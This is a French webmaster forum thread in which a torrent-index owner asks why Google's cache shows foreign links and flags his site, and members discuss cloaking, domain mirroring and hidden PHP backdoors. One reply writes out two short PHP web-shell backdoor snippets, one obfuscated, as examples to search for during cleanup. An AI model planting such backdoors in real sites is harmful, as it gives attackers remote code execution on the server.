[URGENT] Un site remplace mes liens dans le cache Google

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par Boumba, 3 Février 2017.

  1. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Bonjour,

    Lorsque je tape :

    https://webcache.googleusercontent.com/search?q=cache:www.monsite.com
    https://webcache.googleusercontent.com/search?q=cache:monsite.com

    Je vois que c'est bien mon site affiché, mais tous les liens ne sont pas du tout les miens. Je me suis fait hacké le site et Google m'indique que mon site est "dangereux" donc il est bloqué.

    J'ai vérifier le serveur, tous les fichiers du site, apparemment tout est OK.

    J'ai renvoyé la sitemap sur Google Tools, et bien ajouter toutes les propriété. J'ai vérifier mon compte Google rien à redire.

    Comment rétablir cela ?

    Je ne peux pas donner le lien car c'est un site pour adulte.
     
  2. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 663
    J'aime reçus:
    2
    Apparemment non.
     
  3. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Si, lorsque je fais une exploration comme Google, il me sort un site propre

    En plus le site n'est pas très gros, comment le hacker a t il pu modifier le cache ?
     
  4. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 663
    J'aime reçus:
    2
  5. Furtif

    Furtif WRInaute passionné

    Inscrit:
    9 Août 2005
    Messages:
    2 076
    J'aime reçus:
    0
  6. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Au final ma question : comment quelqu'un peut modifier le cache d'un site sans que la personne n'ai accès au site ?

    Je n'utilise pas de CMS.
     
  7. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Oui, justement en le piratant. Ce qui me paraît bizarre, c'est que Google affiche un piratage: alors que ta navigation personnelle semble correcte. Le pirateur fait peut-être du cloaking sur ton adresse IP (ou une autre méthode).

    Fait déjà ping http://www.on_site.com et vérifie si le site est encore hébergé sur ton propre hébergement.
    En deuxième, sio ton site est correct, il y a une deuxième méthode, c'est de faire passer le visiteur (ou Google) par un proxy qui va automatiquement modifier les adresses à sa convenance (technique utilisée par quelques bestioles publicitaires pour afficher d'autres pubs sur les sites que celles présentes dans le navigateur du visiteur).

    Et comme les autres, sans adresse ... en MP par exemple.

    Comme dans tous les cas de hacking: modifier le mot de passe FTP, remplacer le contenu du site par l'original de ton PC et VERIFIER les logs d'accès ... en plus de supprimer les codes sources de piratages.
     
  8. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Ça sent le cloaking sur user-agent, assez habituel en fait. Essaie d'installer un plugin Firefox du type user-agent switcher, fais-toi passer pour Google et navigue sur le site, pour voir.
     
  9. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    J'ai pensé au Cloaking

    J'ai essayé :

    - Plusieurs Navigateurs
    - Plusieurs Proxys
    - Plusieurs VPNs
    - Tor
    - Explorer comme Google (via la console)

    J'ai vérifier tous les fichiers, toutes les connexions SSH, les logs, les DNS chez CloudFlare ainsi que chez mon Registar, rien n'a bougé. Tout est parfaitement légitime.

    Je doute que les fichiers ont été modifiés, j'ai un cron qui vérifie toutes les heures si y'a des modifications dans la structure du site.

    Je viens de refaire une demande d'examen, échec. :evil: :evil: :evil:

    Y'a pas un moyen de contacter Google et parlé à quelqu'un qui peut gérer mon problème ?

    Je vous donne le site : http://www.omgtorrent.me/

    Le site est légal, y'a rien à télécharger, c'est une simple base de données.

    Le cache qui pose problème :

    https://webcache.googleusercontent.com/search?q=cache:eek:mgtorrent.me
    https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.me

    C'est ce site : http://www.omgtorrent.usbypass.webcam/ qui me "baise" la gueule.

    Je ne comprends pas , mes compétences s'arrête là. je suis perdu. ça fait 3 jours que je me tire les cheveux pour trouver une solution.
     
  10. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Lol, l'essentiel c'est de le croire. Mais non, c'est tout sauf légal.

    Pour le reste, il semble que tu as mis en place un mécanisme qui empêche l'accès au site.
     
  11. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Non, c'est une simple base de donnée y'a rien à télécharger.

    Quoi ?
     
  12. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    On va commencer par le début.
    1. extension .me = une petite ile avec 90% de brols (sur mes sites: interdit de visite).
    2. En visitant le site et en cliquant sur les parties à droite= piratage à la première visite, ensuite plus rien (du coup tu vois plus rien ensuite).
    3. redirection CNS vers canada (gonflé quand même)

    Ce genre de bricolage peut pas être de type HTaccess ou bricolage de DNS, mais bien PHP. Revoit ton code.
     
  13. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Tu fais des liens vers des sites qui proposent de télécharger. Il y a déjà eu des condamnations pour ce genre de chose (on en a même parlé ici, quand d'autres ayant ce genre de sites sont venus demander des avis).

    Donc si, c'est illégal. ne pas le reconnaître, ça s'appelle de la mauvaise foi.
     
  14. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    2. Pas très bien compris ?

    3. C'est quoi une redirection CNS ? pas compris aussi :/

    Je ne redirige rien spécialement pourtant.
     
  15. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Cherche dans ton code PHP, au vu de ce qui se passe sur le site, le problème vient de là.
     
  16. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Les sites rediriger ne propose pas les fichiers non plus.
     
  17. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Que dois-je chercher ? je ne comprends pas honnêtement :/
     
  18. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Pardon DNS, c'est ce qui redirige en nom de domaine vers l'adresse d'un serveur.
    UsagiYojimbo et d'autres t'on signalé que ton site est hors la loi. Personnellement, je t'ai donné des pistes et je vais en rester là.
     
  19. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Les redirections DNS sont gérées par cloudflare, donc ça dépend de ton pays.

    je ne vois pas ce qui est illégal.

    Je propose une simple base de données qui répertorie les films, c'est comme les sites qui répertorie les différentes variétés de Cannabis par exemple.

    Je peux comprendre que c'est douteux.

    Bref, les pistes que tu m'as donné :

    1. l'extension .me c'est une extension comme une autre .com .fr .pw ....etc
    2. j'ai strictement rien compris, j'ai testé sur 10 navigateurs differents, téléphones tablettes, j'ai rien remarqué et je n'ai pas saisi ton message, pas claire du tout.
    Si tu parles de ça : https://i.imgur.com/z1BDzr4.png
    C'est pour ça que je suis ici
    3. la redirection dns est donc gérée par cloudflare, je ne suis pas tributaire, le site est hosté en france pas au canada.


    Je savais que je ne devais pas donner le lien, ... la prochaine fois je fermerais ma bouche

    J'aimerai juste comprendre le soucis, comme la personne qui gére le site : usbypass.webcam a pu changer mon cache, sachant que je n'ai pas eu d'intrusion.
     
  20. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Il se passe quoi sur le site exactement ? moi je ne vois rien de spécial..

    Svp, aidez moi, j'en peux plus là, je comprends pas comment ce mec a fait son coup ...........
     
  21. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Je donne 0.3 BITCOIN A CELUI QUI PEUT M'AIDER CORRECTEMENT !
     
  22. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    est ce que sur ton serveur tu écoute sur le servername correspondant uniquement à ton site ?
    genre si tu tape l'ip de ton serveur dans le navigateur ça marche ou pas ?
     
  23. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
  24. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    tu pourrais essayer de faire l'inverse, n'afficher le site que quand l'utilisateur demande via ton nom de domaine.
    parce que sinon, le mec a juste à faire pointer son domaine vers ton ip pour que ton site s'affiche quand on va sur son domaine
     
  25. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    j'avais pensé à ça, mais pour trouver l'ip quand on passe par cloudflare, c'est pas possible, donc je ne pense pas qu'il ai l'ip.

    Mais j'ai ajouter cette protection quand même
     
  26. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    ce n'est pas impossible de trouver l'ip d'un serveur derrière cloudflare, j'ai déjà trouvé des ips de plusieurs serveurs utilisant cloudflare ou équivalent
     
  27. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Sans lien, on ne donnait aucune solution (aucune piste). Avec le lien, on te tombe dessus :roll:
    Dur la vie d'un webmaster :oops:
    On a discuté en MP avec quelques membres ... suis par sur le bon ordi. Te donnerais quelques pistes pour les copieurs demain.

    et plusieurs fois, j'ai donné la piste pour interdire COMPLETEMENT les visites des sites hébergés sur ce brol: interdiction complètes des adresses utilisant ce BROL.
     
  28. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    si tu fais les bonnes manipulations et n'utilise pas d'email ou d'image distante et utilise les DNS A uniquement, ou utiliser crimeflare par exemple mais bon y'a pas de grand risque, bref passons ce n'est pas le problème :p

    Ok patrick_lejeune

    C'est de la faute de google, il intégre un cache d'un autre site pour le mien, ça me rend fou cette histoire :(
     
  29. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Il n'intègre pas le cache d'un autre site, tu t'es fait hacker.
     
  30. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Comme dirait ma fille quand je la chahute: MDR (c'est pas ma génération mais je pense que ca veut dire Mort De Rire).
    Regarde le profil de ceux qui répondent, la majorité sont sur WRI depuis de 10 ans (gratuitement).

    Ca fait deux mois que j'en parle sur WRI (mais trop de boulots), vais adapter dans la semaine un outils de détection ... juste afficher.
     
  31. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    J'ai tout vérifier, même les fichiers, il n'y a jamais eu de modification. :(

    J'ai tjs le probleme, impossible à régler.

    Ceci est le cache Google de http://xxxbbwvids.com/. Il s'agit d'un instantané de la page telle qu'elle était affichée le 2 févr. 2017 23:04:44 GMT.

    Le site à cette date, était comme il est actuellement vu que j'étais là. C'est impossible. :evil:
     
  32. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Et pourtant si le cache correspond à ta page en dehors de ces liens, c'est que tu t'es fait hacker. Que ce soit au niveau des fichiers ou de la Base de Données.
     
  33. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Comment on fait pour connaitre la méthode utilisé ?

    J'ai tout bloqué. :(

    J'ai vérifier tous les logs, tout ce qui est possible je ne trouve rien.
     
  34. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 663
    J'aime reçus:
    2
    T'as vérifié quoi dans les logs ? Quoi dans le code ? Les eval/... et toutes ces techniques ?
     
  35. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    dans tous les /var/log/auth.log & /var/log/apache2

    les fichiers php j'ai un script cron qui m'envoie un mail si y'a la moindre modification de tous les fichiers du repertoire /var/www

    Je remarque que le cache de :

    https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.com

    C'est pareil ? vu que le .com renvoie en 301 vers le .me
     
  36. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    un backdoor peut être présent même sans eval
    un backdoor peut être aussi bidon que :
    ${$_GET['a']}

    (à peu de choses près)

    edit: voici un exemple de vrai backdoor :
    <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>
     
  37. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Y'a pas de backdoor, comme dit plusieurs fois ,les fichiers n'ont pas été modifiés.
     
  38. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    scan ton pc avec un antivirus, vérifie que les ips de serveur configurées sur cloudflare sont celles de ton serveur,
    change tes mots de passes.
    Quelles sont tes méthodes pour affirmer qu'aucun fichier n'a été modifié ?
     
  39. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Je compare, tous les jours, les hashs des fichiers de mon pc à ceux sur le ftp

    j'ai vérifié tous les DNS ainsi que des possibles connexion aux interfaces, y'a rien, et je n'ai reçu aucune alerte

    le mot de passe root ainsi que le compte utilisateur a été changé

    mon pc n'a pas de virus, je ne télécharge aucun fichier sur celui-ci, mais j'ai fait 3 scans différents avec 3 anti virus différent au cas où, y'a rien.


    je suis totalement perdu.
     
  40. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Es-tu au moins sûr de ta tâche cron qui vérifie les fichiers ? Il est aussi possible qu'il y ait eu des ajouts, et des règles supplémentaires dans le htaccess.
     
  41. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Oui je lance le logiciel tous les jours, il compare tous les hashs des fichier img, css, php, js ...etc sur mon PC et je les compare à ceux sur le serveu, la moindre modification j'ai une alerte.

    J'ai re-vérifier quand je l'ai lancé : 29 , 30, 31 janvier, 1,2,3,4,5 février.

    J'ai vérifier la configuration de .conf de apache, rien n'a été modifié, vu que la dernière date de modif de septembre 2016 et aucun fichier n'a été copié / déplacer dans le répertoire /etc/apache2

    je suis sur que je n'ai pas été hacké.
     
  42. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Et pourtant, il n'y pas d'autres solutions. Tu as vérifie dans les fichiers la présence de codes suspects ? Des eval(base64( et trucs du genre ?

    Et tu as vérifié en contenu en base de donnée ?
     
  43. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Oui j'ai vérifié la base de donné, rien de spécial.

    J'ai fait un coup de rkhunter, chrootkit & https://github.com/nbs-system/php-malware-finder

    j'ai bloqué l'ip de https://usbypass.webcam/ mais vu qu'il utilise cloudflare, c'est inutile :(
     
  44. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    ce que je ne comprends, comment on fait pour mettre à jour le cache de google ? lui il y arrive sur un autre domaine, et moi sur mon vrai domaine, j'y arrive pas ...

    mon site est foutu alors ? vu que personne sait me renseigner, et moi je suis trop incompétent

    quelle solution ai-je concrètement ?

    L'iP DU SERVEUR : 89.35.39.197

    https://omgtorrent.usbypass.webcam/
    Je l'ai bloqué sur cloduflare, on peut voir que c bloqué

    pareil pour http://xxxbbwvids.com
     
  45. Furtif

    Furtif WRInaute passionné

    Inscrit:
    9 Août 2005
    Messages:
    2 076
    J'aime reçus:
    0
    [​IMG]

    C'est de l'humour hein..... :D :D :D :D
     
  46. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    vu que j'ai bloqué les 2 sites qui me font chier, peut être que google va accepter de valider mon site

    c'est ça que je comprend pas, il veut pas le valider car y'a un virus, alors que c un autre site qui vol mon cache

    personne ne peut m'aider ? :(
     
  47. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 663
    J'aime reçus:
    2
    Si on t'aide on est complices...
     
  48. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Complice de ?

    Montre moi ce qui est illégal et je ferme le site.
     
  49. Furtif

    Furtif WRInaute passionné

    Inscrit:
    9 Août 2005
    Messages:
    2 076
    J'aime reçus:
    0
    C'est pourtant simple.... Les torrent ne sont pas illégaux en soi..

    En revanche, donner des liens vers des fichiers illégaux l'est... Si ton site donne acces a un contenu illegal, ce qui est le cas, que celui ci soit heberge chez toi ou ailleurs ca ne change rien au fait que c'est toujours illegal.

    ET franchement encore utiliser Torrents aujourd'hui, faut vraiment etre nunuche...

    Apres c'est comme les excès de vitesse sur l'autoroute, personne ne t'empêcheras de rouler a 200, il est juste interdit de se faire prendre... et tot ou tard....

    Et si vraiment tu etais si serein que ca, cette page n'existerai pas :
    https://www.omgtorrent.me/comment-filtrer-les-ips-indesirables-sur-bit ... adopi.html

    Franchement...

    :D
     
  50. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Alors, aucun lien n'est diffusé, c'est plutôt un attrape nigaud tu comprends ?

    Ensuite, des liens comme https://www.vice.com/fr/article/comment-devenir-un-fraudeur-de-cartes-bleues & http://www.konbini.com/fr/tendances-2/fini-les-dealers-je-chope-ma-wee ... -internet/ sont pire que moi je pense

    omgtorrent est surement "douteux" je le reconnais, mais pas illégal en soit, on ne propose aucun fichier, et aucun lien vers du contenu illégal, car usenet, c'est du attrape nigaud, y'a des sites pire que les miens, mais vous les aidez quand même :p
     
  51. Furtif

    Furtif WRInaute passionné

    Inscrit:
    9 Août 2005
    Messages:
    2 076
    J'aime reçus:
    0
    Rôôôôôôôôô WRI repaire de hackers....

    T'en es fier ? et c'est pire encore, c'est de l'arnaque

    C'est sûr, il y a toujours pire, ca permet de se donner bonne conscience...

    ET comprends bien que je ne te jette pas la pierre, j'ai fait pire il fut un temps.. mais j'ai raccroché mes gants et emprunté la voie de la sagesse il y a un peu plus de 10 ans..
     
  52. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Pas spécial fier non.
     
  53. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Malgrés tout ce que j'essaie de faire :

    Échec de l'examen de http://omgtorrent[.]me/

    J'en peux plus :(
     
  54. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Ca dégénère :roll:

    On récapitule:
    1. le site est hors chartre et ... hors législation (pas trop discuter ... > Boomba)
    2. en visitant le site, tout semble correct sauf:
    . première vite et pubs hors normes (Patrick ... moi)
    . site nettoyé (m'en doute, surement pas) et réponse de SPOUT iden puisque le problème reste.

    Ce forum est un espace d'échange et de compréhension: on peut tous (débutant comme vieille bête de WRI) se retrouver avec un problème identique.
    C'est pas la première fois cette année que ca part de "hors ...". Personnellement, je suis pas d'accord avec le site et sa thématique mais le type de piratage (copie) peut aider des Webmasters à corriger un problème sur d'autres sites.
    > Boomla: les gros MP ne changent pas mon boulot sur WRI (je l'ai effacé sans le lire): il y a 5 ans, ma boîte débordais.
    On reprend au début (en oubliant la thématique discutable du site).
    Patrick
    > Tu attend et nous laisse travailler (merci)
    On commence par des trucs simples: les pubs à droite: tu vire temporairement (et pas redemander dans l'heure une redemande Google). analyse anti-virus sur ton PC . malwarebyte. Retransfert le site par FTTp en cheangeant sur l'hébergement tous les codes avant.
     
  55. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Les pubs : je vais les retirer, mais je doutes que ça soit, car ça reste des pubs de régie pubs légitimes, j'en ai déjà parlé avec la personne qui s'occupe de ça, y'a aucun probleme

    Analyse anti virus : comme dit plus haut, fait 3 fois avec 3 AV differents, Malware pareil

    Changement des mots de passes (2, root et user), màj du serveur, mais il est en constante màj, tous les jours en cron

    Restransfert : FTP : fait et refait :O

    je vais devoir attendre que google mette à jour son cache :

    https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.me
    https://webcache.googleusercontent.com/search?q=cache:eek:mgtorrent.me
     
  56. UsagiYojimbo

    UsagiYojimbo WRInaute accro

    Inscrit:
    23 Novembre 2005
    Messages:
    12 380
    J'aime reçus:
    0
    Sauf que si tu n'as rien changé, le problème est toujours là. Tu a lancé des scripts pour tester si tes fichiers étaient corrompus, mais tu as regardé manuellement ?
     
  57. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Honnetement, ça fait 5 jours que je fais tout ce qui est possible faire, j'ai vraiment tout fait.

    J'ai même changé de serveur à l'instant.

    Je pense qu'il attendre que google mette a jour son cache pour qu'il revalide mon site, je vois que ça.
     
  58. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    tu vérifie le contenu de /var/www mais as tu vérifié la config de nginx
     
  59. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    je suis sur Apache2, et oui vérifié :)

    Le cache de Google a été purgé apparemment, j'ai fait une nouvelle demande.
     
  60. Boumba

    Boumba Nouveau WRInaute

    Inscrit:
    3 Février 2017
    Messages:
    31
    J'aime reçus:
    0
    Toujours, pas échec

    je vais me pendre, je reviens.

    J'ai retiré toutes les pubs possibles, le cache a été purgé, et tjs echec, là je ne comprends pas.

    J'ai fait tous les scans possibles, sur je ne sais pas combien de PC / navigateur / ip différent(e)s rien rien rien

    ALLLLLLLO GOOGLE ? :mad:
     
  61. patrick_lejeune

    patrick_lejeune WRInaute occasionnel

    Inscrit:
    1 Avril 2016
    Messages:
    457
    J'aime reçus:
    0
    Prend ton temps mais ca résoudra pas le problème :wink: .
    Un petit truc me vient à l'esprit: un frame avec une espèce de redirection à partir d'un autre site. En gros, le site qui envoie le lien est vérollé et c'est ton site qui en prend une
    Si c'est cela: il y plusieurs techniques :
    1. par javascript (et pas suivi par les moteurs :oops: ) dans le header:
    2. par php (c'est plus complexe puisque tu dois récupérer l'adresse effective de la page ... comme c'est un développement personnel: c'est possible).

    Si c'est ce genre de brol (déjà bloqué quelques parasites de cette méthode mais mon script est plus performant avec envoi des adresses dans une table MySQL).